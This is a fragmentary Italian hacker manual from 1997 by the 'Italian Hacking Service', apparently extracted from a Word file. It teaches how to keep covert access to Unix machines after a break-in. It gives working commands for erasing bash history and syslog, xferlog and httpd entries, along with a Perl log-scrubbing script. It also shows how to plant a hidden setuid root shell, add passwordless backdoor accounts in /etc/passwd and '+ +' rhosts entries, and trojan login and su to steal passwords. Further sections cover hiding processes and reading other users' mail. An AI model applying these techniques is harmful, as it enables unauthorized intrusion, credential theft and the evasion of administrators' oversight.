0 users,  load average: 0.07, 0.02, 0.0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er     tty       login@  idle   JCPU   PCPU  wha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giusto per essere sicuri che siamo ancora soli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jnsmith]# ls -al /tmp/.p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otal 1569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w-r--   1 root     root          157 Jan 29 06:10 .pinttemp.000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jnsmith]# ls -a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otal 3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wx---   5 jnsmith   jnsmith   1024 Jan 29 06:11 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r-x  33 root      users     1024 Jan 22 16:53 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-----   1 jnsmith   jnsmith   1126 Aug 23  1995 .Xdefaul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rwxrwxrwx   1 jnsmith   jnsmith      9 Jan  1 21:40 .bash_history -&gt; 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--r--   1 root      jnsmith     24 Jan  1 03:12 .bash_logou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--r--   1 root      jnsmith    220 Jan  1 03:12 .bash_pro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--r--   1 root      jnsmith    124 Jan  1 03:12 .bashr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rw-r--   1 root      jnsmith   5433 Jan 11 22:47 .piner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wxr-x   2 jnsmith   jnsmith   1024 Jan 29 06:22 .ter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r-x---   2 jnsmith   jnsmith   1024 Feb 17  1996 .xf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rwx------   2 jnsmith   jnsmith   1024 Jan 11 22:47 ma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jnsmith@ns jnsmith]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----&gt; Assicurati di mettere questo sys link .bash_history in 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ab/>
        <w:t xml:space="preserve">    in modo tale da non lasciarti dietro history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 scolleghiamoci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 c'e' un altro modo!!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ricordi non devi MAI dimenticare che quando entri in un account dev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gitare : unset HIST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dira' al sistema di cancellare il tuo history quando ti scollegh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l sistema. USALO, NON DIMENTICARLO !!!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6B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essaggi e sys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lla directory di log troverai un file chiamato 'messages' ed in ogni siste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' differente. Assicurati di controllare nel file /etc/syslog.conf eventual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ging in macchine remote aggiunti. Se esistono vedrai una cosa del gener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.*                                 @somehostname.xx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ppure per vedere dove vanno a finire i file di log controlla il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etc/syslog.conf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co un esempio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more syslog.con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/etc/syslog.con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For info about the format of this file, see "man syslog.conf" (the BSD ma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page), and /usr/doc/sysklogd/README.linux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NOTE: YOU HAVE TO USE TABS HERE - NOT SPAC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I don't know why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.=info;*.=notice                               /var/adm/messag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.=debug                                        /var/adm/debu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.warn                                          /var/adm/sys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.warn                                          /root/.../sys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.=crit;kern.none                               /var/adm/critica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kern.info;kern.!err                             /var/adm/kernel-inf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l.*;mail.!=info                              /root/.../ma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l,news.=info                                 /root/.../inf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l.*;mail.!=info                              /var/adm/ma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l,news.=info                                 /var/adm/inf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.alert                                         root,bob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.=info;*.=notice                               @quality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.=debug                                        @quality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.warn                                          @quality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.=crit;kern.none                               @quality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kern.info;kern.!err                             @quality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l.*;mail.!=info                              @quality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l,news.=info                                 @quality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i, alcuni dei logs sono in una directory nascosta in /root ed inoltre un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pia di ogni alert e warning sono stati spediti a quality.com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wtmp, utmp e lastlog sono ancora in questa macchina, quindi puoi sta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anquillo, pero' assicurati di non usare mai 'su' in un sistema come ques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oltre nota che i messaggi di alert sono spediti in questo sistema a root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bob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oltre prendi nota che syslog, mail, e info sono spediti a /var/adm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, quindi devi andare in /var/adm o /var/log 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rep yourhost * |mo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rep your ip * |mo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edrai che alcuni files hanno registrato la tua connessone, segnateli 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dita il file /etc/syslog.conf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opo che hai editato il file fai ripartire il syslogd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uoi farlo facendo ps -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root&gt; ps -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9  ?  S    1:29 /usr/sbin/syslog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ova il syslogd e annota l'id del processo (in questo caso 39) quindi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kill -HUP 39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fara' ripartire il processo e rendera' effettive le vostre modifich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a le altre cose bisogna assicurarsi di fare un ls -l /etc/syslog.con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MA di editarlo e ripristinare la data come era prima quando si ha fini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 un altro file da guardar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etc/login.def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Enable "syslog" logging of su activity - in addition to sulog file loggin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SYSLOG_SG_ENAB does the same for newgrp and sg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SLOG_SU_ENAB          y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SLOG_SG_ENAB          y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If defined, all su activity is logged to this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LOG_FILE      /home/users/bob/.li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ta che esiste un su log file in un file nascosto in una delle directo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ll'amministrato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6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xfer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'xferlog puo' essere editato con il tuo text editor preferito, pico, joe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i ecc. Puoi quindi cercare i tuoi transfers e cancellare le linee e salva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i il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tresti anche 'greppare' i files nella directory /usr/local/etc/httpd/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hai usato web o phf sul sistema, per rimuovere le tue tracc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rep (username or hostname) * |mo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 hai bisogno di trovare i logs per httpd puoi fare un find - nam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ttpd.conf- stampare e vedere dove son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i possono essere logs ftp differenti in alcune directory ftp o virtual ftp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uarda i files in /etc/ftp* per trovare quale setup di ftp e' nel box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i ho mostrato come editare i log usando pico, joe o altri edito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'e' un altro modo... Alle volte i logs possono essere molto grandi e gli edito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n ce la fanno. Questo e' cio' che devi fare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ai un file messages di 20 meg ...wow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vuoi eliminare le linee che hanno fudge.candy.com dal file devi far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rep -v fudge.candy &gt;messages.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m messag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v messages2 messag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indi kill -HUP &lt;process id for syslogd&gt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-v significa che deve greppare qualsiasi cosa che non sia fudge.candy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etterlo in messages.2. Controlla la dimensione del file dopo il grep p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sere sicuri che non ci siano stati errori e fai ripartire syslog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puo' essere fatto per altri log come xferlog, syslog, ecc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 un script in perl che fara' questo per te dalla linea di comand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 inizio riptext.p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!/usr/bin/per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# RipText - Takes regular expression and filename argument from @ARGV. Any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#           lines MATCHING regular expression will *not* be printed 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#           STDOUT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#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e("\nUsage: riptext [regexp] {filename}\n\n") if (!defined($ARGV[0])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($regexp, $filename) = @ARGV[0,1]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Read in contents of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/ = undef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$contents=""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(!defined($filename)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Use STDI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contents = scalar &lt;STDIN&gt;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 els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 Use FIL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open(FILE, "&lt;$filename") || die("-RipText- Cannot open $filename: $!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$contents = scalar &lt;FILE&gt;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lose(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@contents = split(/\n/, $contents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Strip file of matching lin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pen(FILE, "&gt;$filename") || die("-RipText- Cannot write $filename: $!\n"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oreach (@contents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 FILE "$_\n" unless (/$regexp/i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lose(FILE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0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 fine di riptext.p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corda di far ripartire syslogd dopo aver editato i file!!!!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6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cron tab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ssicurati di controllare i cron files di root e dell'amministratore, in quest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stema abbiamo trovato un root cron file in: /var/spool/cron/crontab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# ls -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otal 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w-------   1 root     root          851 Jan 26 14:14 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 more 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 This updates the database for 'locate' every day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40 07 * * *       updatedb 1&gt; /dev/null 2&gt; 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40 */12 * * *       /sbin/checkf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'e' un file che gira in /sbin chiamato checkf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 cd /sb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sh$ /sbin # more checkf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!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[ ! -f /etc/default/fs/.check ]; the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cho WARNING!! Filecheck default file cannot be found. Please regenerat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ex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f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d5sum /usr/bin/* &gt; /tmp/filecheck 2&gt;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d5sum /usr/sbin/* &gt;&gt; /tmp/filecheck 2&gt;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d5sum /sbin/* &gt;&gt; /tmp/filecheck 2&gt;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d5sum /bin/* &gt;&gt; /tmp/filecheck 2&gt;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d5sum /usr/local/bin/* &gt;&gt; /tmp/filecheck 2&gt;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d5sum /usr/local/sbin/* &gt;&gt; /tmp/filecheck 2&gt;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d5sum /lib/* &gt;&gt; /tmp/filecheck 2&gt;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d5sum /usr/lib/* &gt;&gt; /tmp/filecheck 2&gt;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ff /tmp/filecheck /etc/default/fs/.check &gt; /tmp/filecheck2 2&gt;&amp;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f [ -s /tmp/filecheck2 ]; the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mail -s FSCheck bin &lt; /tmp/filecheck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f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m /tmp/filecheck /tmp/filecheck2 2&gt;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d5 e' un checksum file. Se cambi o aggiungi un file in una delle directo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opraindicate, il cambiamento viene maillato all'amministratore!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itolo 7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ttenere l'accesso alla macchin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i sono molti modi per ottenere l'accesso ad una macchina.All'inizio perdera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'accesso cosi' velocemente come stai imparando, ma spero che ques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nuale ed un po' di esperienza ti facciano diventare un buon hack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7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ucchi e segre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i sono alcuni trucchi che ti permetteranno di ottenere accesso alla macchin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po che un amministratore ti ha beccato, egli controllera' tutto il sistem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gli ricompilera' i file di sistema, cambiera' le password a tutti i suo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tenti,vietera' l'accesso da parte del tuo host alla sua macchina, controllera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 file delle password ecc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ando vedi che sei stato scoperto, non provare ad entrare di nuovo in que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stema. Ho visto persone che nonostante fossero stati scoperti, cercavan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utilizzare i loro exploits, le loro backdoor e account. Tu sei controllat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d e' molto piu' facile che ti becchin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! ANZI UN MOMENTO! Lascagli qualche mese, loro pensreanno che e' tutto ok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 si rilasseranno. cosi' tu potrai rientrare utilizzando una delle backdoors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e si sono dimnticati di cancella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k e' arrivato il momento di dare qualche trucco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istory Fil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etti sempre il tuo .bash_history in /dev/null, se sei sicuro che non dev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ditarlo. Ricorda che .bash_history avra' sempre il tuo ultimo comando pri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el logoff. Quindi se tu lo editi, esso mostrera' che lo stavi editando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tresti provare a cambiare la tua shell ed editarlo li' ma e' un casino, e'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eglio settarlo a /dev/nu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. Cancella il file nella directory dell'utente .bash_history se c'e'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. Digita il comando nella home directory: ln -s /dev/null .bash_histo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ectory nidificat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ova sempre una directory nel sistema per nascondere i tuoi file. Ce ne son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lcune nelle quali gli utenti non guardano ma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lla home directory dell'utente cerca .term, tutto cio' che troverai in quest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ectory e' un eseguibile chiamato termrc. Gli amministratori e gli uten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aramente guardano questa directory nascosta e non ci entrano MA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si' noi renderemo termrc un po' piu' grande, e gli aggiungeremo i permess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id... hai capito l'idea? Spero tu abbia indovinato... vai nella directory /b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digita : cp bash (o sh o la shell che c'e') ~username/.term/termr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i digita : chown root ~username/.term/termr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: chgrp root ~username/.term/termr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: chmod +s ~username/.term/termr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desso hai un file nidificato che puo' darti l'accesso a root ogni volta ch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uoi e che e' difficile da individuare da parte dell'amministratore. Se poi vuo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are il figo cambia la data pe far sembrare il file vecchi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altra directory nell'account dell'utente non usata potrebbe essere .elm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.term o Mail, o prova a creare una directory chiamata '...', questa e' diffic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 individuare, visto che le prime dir che vengono mostrate sono '.' e '..'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e' quello che appare dopo un ls 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024 Jan 29 21:03 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024 Dec 28 00:12 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024 Jan 29 21:03 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509 Mar 02  1996 .bash_histor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22 Feb 20  1996 .forwa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164 May 18  1996 .kermr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34 Jun 06  1993 .les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114 Nov 23  1993 .lessr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024 May 18  1996 .ter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024 May 19  1996 public_htm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perviene digitato un ls -l, questo e' quello che si ved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024 May 19  1996 public_htm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corda che puoi sempre cercare qualche REAL LONG file path dove sei sicur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e nessuno entra mai, ed usarlo per le directory nidificate. Puoi semp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reare la tua directory (...) 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reare nuovi comand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opo aver controllato il cron per vedere se si sta usando md5, puoi anch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piare uno dei tuoi exploits in un altro filename nel sistema o solament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ovrascrivere un comando che sai che non asara' mai usato. Se copi un file i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altro con un altro nome assicurati di controllare la data del file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l tutto non e' molto duraturo perche' prima o poi la versione sara' patchata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exploit non funzionera' piu'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' meglio usare una shell con un nuovo nome e quindi farla sui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ggiungere o cambiare la lista delle passwo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'altra backdoor che puoi usare e' aggiungere un nuovo utente nel file del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word. Pero' bisogna farlo con prudenz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n usare mai la password che hai aggiunto, non loggarti mai, e' solo per backu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 caso tu perda l'access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i sono varie scuole di pensiero: una dice che non devi mai aggiungere un ro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ccount che e' come dire "Guardate sto hackando il vostro sistema!!"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 modo per farlo e'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:fVi3YqWnkd4rY:0:0:root:/root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sop:mZjb4XjnJT1Ys:582:200:System Operator:/home/sysop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in:*:1:1:bin:/bi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emon:*:2:2:daemon:/sbi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dm:*:3:4:adm:/var/adm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p:*:4:7:lp:/var/spool/lpd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nc:*:5:0:sync:/sbin:/bin/syn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hutdown:*:6:0:shutdown:/sbin:/sbin/shutdow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alt:*:7:0:halt:/sbin:/sbin/hal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l:*:8:12:mail:/var/spool/mail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ws:*:9:13:news:/usr/lib/news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ucp:*:10:14:uucp:/var/spool/uucppublic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perator:*:11:0:operator:/root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ames:*:12:100:games:/usr/games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n:*:13:15:man:/usr/ma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stmaster:*:14:12:postmaster:/var/spool/mail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body:*:65535:100:nobody:/dev/null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tp:*:404:1::/home/ftp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cco le cose che si possono fare con questo passwd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. Guarda le linee con operator, ftp e postmaster. Tutti questi account hann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hell senza password. Dalla tua shell digit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wd postmast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tta l'account senza inserire la password semplicemente premendo enter. Adess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i in grado di entrare con questo account ogni volta che vuoi senza un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wo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d il file passwd rimarra' invariato senza destare sospett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. Aggiungi questa linea al file delle password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st::13:12:system:/var/spool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uoi lasciare i :: o inserire una password che vuoi digitando dalla root shel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wd syst. Metti il GID e l' UID che vuo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. Osserva la linea sott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nc:*:5:0:sync:/sbin:/bin/syn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mbiala in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ync:*:5:0:sync:/sbin:/bin/bash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 quindi lancia &lt;passwd sync&gt; lasciando la password vuota. (o settala, non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mporta) Su questo account noi siamo sempre GID=0 &lt;G&gt;r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sere sempre in agguat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apere sempre chi e' l'amministratore di sistema; puoi trovarlo guardando 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ile delle password (/etc/passwd in genere). Devi vedere la sua home, il su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id, i group access account, e leggere SEMPRE tutti i file di bush_history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ll'user directory per vedere chi sta usando i comandi da amministrato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uoi cosi' conoscere molti comandi nuovi dalla lettura degli history, ma tu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vi anche sapere chi c'e' nel sistema. Devi conoscere bene il tuo sistem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rca gli utenti usando su: Guarda i log file per vedere chi sta usando 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andi da amministrato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ieni sempre sotto controllo il sistema, tieni traccia di chi e' presente ne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stema mentre sei dentro anche tu. Guarda l'history dell'admin per ved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e comandi esegue: ttysnoops? Troppi comandi ps, w o who dimostrano che stann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trollando cosa stanno facendo altri utenti nel sistem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eggere le mail di siste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corda di non usare MAI programmi di mail di sistema! Essi sono in grado d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e che tu stai leggendo le loro mail. Io uso un insieme di accorgimenti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. cd /var/spool/ma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si' entrerai nella directory che contiene tutte le mail non lette. Adess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uoi fare una cosa del genere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rep -i security * |mo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rep -i hack * |mo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rep -i intruder * |mo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rep -i passwd * |mo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rep -i password * |mo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uoi anche cancellare messaggi se vedi che qualche altro amministratore dic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e qualcuno nel sistema dove sei sta hackando la sua macchina. Eh, la spi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n si fa ;)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 trovare un mail reader che ti permette di leggere mail senza aggiornare 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untatori, prova a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ttp://obsidian.cse.fau.edu/~f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i ci sono utility ceh riescono a fare il cat /var/spool/mail senza cambia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 data dell'ultima lettur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corda inoltre che puoi trovare altre system mail nelle directory degli uten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ssicurati di guardare nella directory /root. Guarda in /root/mail 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ername/mail o in altre directory che contengono mail vecchi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uona caccia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7B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ckdoor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reare una backdoors e' uno dei modi piu' semplici ed allo stesso modo piu'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cur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er mantenere l'accesso come root ad un sistema. Oltre a quelle gia' vist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poniamo alcune idee che potrete facilmente realizza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e backdoors forniscono due o tre funzion principali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1. "Garantisce" l'accesso al sistema ancche se l'amministratore tenta d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enderl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iu' sicuro, per esempio cambiando tutte le passwor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2. "Garantisce" l'accesso alla macchina in modo meno visibile p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amministrato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Alcune di esse possono renderti invisibile agli acchi di chi controlla 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istem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. Fornisce l'accesso alla macchina in modo molto piu' veloce rispetto a quand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i e' provato a exploittarl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ckdoors 1 : Cracking del file di passwo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o dei metodi piu' antichi per guadagnare un accesso in un sistema. Di quest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 abbiamo parlato approfonditamente nel capitolo 2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ckdoor 2 : Rhosts + +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lle macchine Unix, alcuni servizi come Rsh e Rlogin usano un semplice metod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identificazione basato sugli hostname che compaiono nel file .rhost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amministratore puo' scegliere quali macchine non necessitano di password p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llegarsi. Basta inserire nel file rhost la linea "+ +". In questo cas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iunque si colleghi in remoto con quella macchina lo fa senza inserire l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sword. Anche ogni utente possiede nella sua HOME un file .rhosts. Se s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esce a modificarlo aggiungendo "+ +" si puo' fare un rlogin a quell'uten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d entrare senza password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TTENZIONE che molti amministratori controllano la presenza dei due + in tut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li .rhosts!!!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ckdoor 3 : Checksum e Timestam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olti hackers rimpiazzano dei file di sistema con i propri cavalli di troi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ltrettanti amministratori, per scoprire questo si affidano a dei programm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e controllano il checksum e il time-stamp  come il famoso sum di UNIX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e contromossa gli hacker hanno al loro volta costruito dei programmi ch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ricreano il time-stamp originale ai trojan. Tutto questo mandando indietr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'orologio di sistema all'ora del fle originale  quindi modificando l'ora del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ojan all'ora di sistema. Una volta che il trojan ha l'ora dell'origina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clock di sistema viene ripristina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programma sum si affida al controllo del CRC dei file ma spesso vien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poofes. Noi hacker abbiamo sviluppato dei programmi che modificano i troja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 modo da avere il checksum originale, facendo impazzire gli amministrator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D5 checksum si basa su un algoritmo che nessuno fin'ora e' stato in grado d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poofa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ckdoor 4 : Log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 UNIX il programma login e' quello che si occupa della identificazione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trollo delle login e password quando ci si telnetta ad una macchin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li hacker ricompliano il file login.c in modo che le login + password inseri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gli utenti vengno loggate in un file in qualche directory. In questo mod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hacker legge questo file ed ha tutte le login e pwd pronte in un piatt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argento. In questo modo ci si puo' loggare senza che l'amministratore no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alcosa di strano. Molti adm trovano queste backdoor con MD5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ckdoor 5: Telnet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ando un utente si telnetta ad una macchina, il servizio inetd che ascolt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 quella porta riceve la connessione e la passa ad in.telnetd, esso esegu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olti controlli sull'utente come il tipo di terminale che sta usand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eneralmente il terminale e' settato ad Xterm o VT100. L'hacker puo' fare in mod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e, per esempio, quando il terminale e' settato ad "letmain" in.telnet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ndi una shell senza fare nessun controllo. Ovviamente per farlo e' necessari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odificare l' in.telnetd. Questo e' solo un esempio, i servizi disponibili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ono molti e si possono inventare altrettante backdoo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ckdoor 6: Libreri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a maggior parte dei sistemi Unix usano delle librerie condivise. Quest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ibrerie vengono utilizzate da piu' programmi in modo da non appesantirne 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dice di ogni singolo. Gli hackers modificano le routine come cript.c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_crypt.c per avere dei vantaggi. Per esempio, programmi come login.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sano la routie crypt(); si puo' modificare il codice in modo che se si inserisc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a certa password viene aperta una shell suid. cosi' anche se l'amministrato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tilizza MD5 sul programma login non notera' niente di irregolare. Raramen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li adm controllano le librerie con MD5. Se dovesse capitare si puo' utilizza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a piccola scorciatoia. E' possibile modificare le librerie di accesso a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le come la open() in modo che venga letto il file originale ma veng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eguita la versione trojan. In questo modo quando MD5 controlla un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iene letto quello giusto ,cosi' il checksum e' corretto, ma viene eseguit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trojan. Divertente no? Le librerie stesse non vengono intercettat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ttenzione, pero', che alcuni adm compilano i programmi con link statici, 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odo da non utilizzare le librerie codivis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ckdoor 7: File syste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e sappiamo quando si entra in un sistema abbiamo bisogno di una seri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sniffer, log, exploit rootkit ecc. per continuare l'hacking. Ma qu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sce un problema... Come nascondere questi programmi all' amministratore?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rto, perche' se li scopre... Quindi si puo' o modificare i comandi "ls", "du"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"fsck" per nascondere l'esistenza dei nostri tool, oppure e' possib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reare una sezione dell'hard disk marcata come bad sector. cosi' l'hack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uo' accedervi solo con tool speciali, ma per l'amministratore e' diffic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ndividuare che sotto il marchio di bad sector si nasconde uno spazi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sponibile per noi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ackdoor 8: Nacondere i process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 hacker, qualche volt, vuole nascondere i processi che fa giare. Generalment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ono password cracker o sniff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i sono molti modi per farlo, per esempio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i puo' rinominare il nostro programma col nome di un servizio del SO com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.syslog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ando l'amministratore digita un ps vedra' girare un programma standar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 puo' modificare il programma ps in modo che non visualizzi i nostri prg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 potrebbe anche modificare il kernel per evitare di far mostrare i nostri prg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somma ci sono molti modi per nasconderli, basta un po' di fantasia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zione 7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oot &amp; Demon Kit e Troja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 Root Kits sono sorgenti C per ps, login, netstat ed altri programmi hacka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er te. Con questi kit sarai in grado di cambiare i login file nell'hacked box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 modo da poterti loggare senza un account nella macchina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arai anche in grado di patchare il ps in modo da non essere individuato quand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amministratore usa il comando ps. Con il ps patchato puoi anche non fa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ostrare  processi che hanno certi nomi, per esempio quelli che iniziano co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'sniff';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I demon kit hanno programmi hackati per identd, login demon, ping, su, telnet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socke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 Trojan sono tutti quei file che ti permettono di exploittare il sistema i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alceh modo. Un trojan 'su' messo nella directory dell'amministratore s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eguira' quando l'admin lo chiamera' per fare qualche operazione. Dopo ch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gli inserira' la sua password, il trojan 'su' gli comunichera' che la passwo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serita e' sbagliata e si autocancellera' dopo aver salvato la password nell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rectory /tmp. A questo punto l'admin credera' di aver sbagliato a digita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riprovera'. Questa volta parte l'su vero e tutto procedera' normalment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trojan di login, invece, salvera' tutte le login e password in un file p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 Appendice I -  Cosa fare dopo un accesso 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nso che in questo manuale abbiamo descritto la maggior parte delle cose ch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isogna fare dopo un accesso, nonosatante ridescriviamo i passi in una list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lla a alla z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. trova chi sono gli amministratori del siste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b. analizza il sistema con ps -auxe e ps -auxef (se funziona) e pstree p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vedere cosa stanno facendo gli altri uten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. leggi tutti i file di bash history o tutti gli history file che riesci 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trovare sulla macchina per imparare di piu' sugli utent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. crea delle backdoors nel sistema in modo da non essere scopert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. tieni l'accesso per te e non dare user password ad altre persone dell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macchina dove sei roo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. cancella sempre i tuoi utmp e wtmp quando ti connet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. cancella sempre i tuoi messaggi inclusi i tuoi xferlo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h. se hai l'accesso di root assicurati di lggere /etc/syslog.conf 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/etc/login.defs  per vedere come il sistema e' loggato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. prima di cambiare file controlla il root cron per vedere cosa sta girand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. cerca md5 sul sitse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k. cerca ftp logs separa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. assicurati di cancellare i www logs se hai spedito comandi phf al serv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. crea una suid root shell e mettila da qualche parte nel sistem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. fai solo ciche sei sicuro di saper fa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. usa solo directory nidificate, non mettere file in user directory dov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basta fare un ls per vederl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. non aggiungere user account e pensare che non ti scopran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. non usare pine o altri mail program per leggere le mail degli utenti. S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vuoi leggere le mail vai nella directory mail e leggile da qui, le ma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nuove le troverai in /var/spool/mai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. non cambiare il sistema in modo tale che altri programmi che girano no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unzionino piu'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. non cancellare file dal sistema a meno che non gli hai messi tu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. non modificare le web pag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. non cambiare alcuna password del sistema (a meno che lo stai facendo p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accedere al sistema salvando il passwd e risostituendolo dopo che ti se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 xml:space="preserve">collegato)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. non usare il root account per accessi irc o per caricare un b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. se il tuo root account cambia o crei file che sono propritari di un grou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bagliato, assicurati di eseguire il chown dei fil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x. non usare il .rhosts se ce n'e' gia' uno in us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y. non telnettare o usare ftp dall'hacked bo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z. non fottere la loro macchina! Fai cio' che sai fare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 Appendice II - Siti Hacking / Security www / ftp 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RC QuantumG #viru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antum's Linux Pag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ttp://obsidian.me.fau.edu/~quantu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uon sito per avere informazioni sugli exploits di uni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yberToast's Files sectio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i troverai una buona sezione dedicata all H/C/P/V hex editors, scanners ecc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ww.ilf.net/~toast/fil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eptiles Real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uon sito per i linux exploi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ww.users.interport.net/~reptile/linu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to ftp su IRC, BOTS, UNIX EXPLOITS, VIRUSES e ZINES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ttp://ftp.giga.or.at/pub/hack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inux Security Dige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ttp://king.dom.de/~un/linux-securit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inux Security Aler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ttp://bach.cis.temple.edu/linux/linux-security/Linux-Aler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e Linux Security Home Pag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ttp://www.ecst.csuchico.edu/~jtmurphy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 trovare i siti basta fare una ricerca con Yahoo, Altavista e Astalavist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(astalavista.box.sk) con chiave hacking, hack, crack ..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 Appendice III - Files UUENCODATI   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******************************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. Quantum's bindwarez utility uuencod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indwarez binary file da usare con la 'Quantum's PHF guide'per ottenere degl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ccount (vedi sezione PHF in questo testo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CLUSION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i della IHS speriamo che questo manuale ti sia utile...Non pretendiamo ch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phile ti faccia diventare un HACKER. Noi pero' pensiamo che questo si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un buon inizio. Consigliamo di installarti linux sulla tua macchina e provar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d entrarci. Oppure se conosci qualcuno che gestisce un sistema chiedigl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 ti fa fare degli esperimenti... Insomma rimboccati le maniche e prova, prova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prova... solo cosi' sarai anche tu un vero HACKE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y Italian Hacking Service, gruppo hacker in continua evoluzion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@Copyleft IHS 1997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documento puo' essere liberamente redistribuito. Se volete aggiunger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alsiasi cosa inviatecela e noi provvederemo ad inserirla nella prossima version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ssimi Articoli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 Sniff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 TCP Spoofin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 varie ed eventuali (eh eh eh)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9:55:00Z</dcterms:created>
  <dc:creator>Anonymus</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Anonymus</cp:lastModifiedBy>
  <cp:lastPrinted>1998-06-29T11:54:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">1998-06-29T09:55:00Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title>                       L A  I H S  P R E S E N T A  </dc:title>
</cp:coreProperties>
</file>